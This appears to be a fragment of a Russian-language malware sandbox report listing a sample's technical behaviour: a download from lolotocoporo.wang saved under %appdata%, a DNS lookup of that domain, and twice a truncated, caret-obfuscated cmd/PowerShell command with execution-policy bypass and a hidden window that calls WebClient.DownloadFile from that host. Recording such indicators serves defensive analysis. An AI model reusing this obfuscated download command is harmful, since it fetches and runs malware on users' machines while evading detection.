Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WER^ShE^l^L^.EX^e -E^xeCUTiO^NPoli^c^Y by^P^aSs^ -N^o^P^rofiLe^ -wi^n^dOw^sty^l^e^ hidD^e^N ^(N^E^W-obJ^Ect SysTEM.^NEt^.^Webc^lie^NT^)^.^d^Ow^NLOAdF^ile('http://lolotocoporo.wan...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /C "Po^WER^ShE^l^L^.EX^e -E^xeCUTiO^NPoli^c^Y by^P^aSs^ -N^o^P^rofiLe^ -wi^n^dOw^sty^l^e^ hidD^e^N ^(N^E^W-obJ^Ect SysTEM.^NEt^.^Webc^lie^NT^)^.^d^Ow^NLOAdF^ile('http://lolotocoporo.wan...' (со скрытым окном)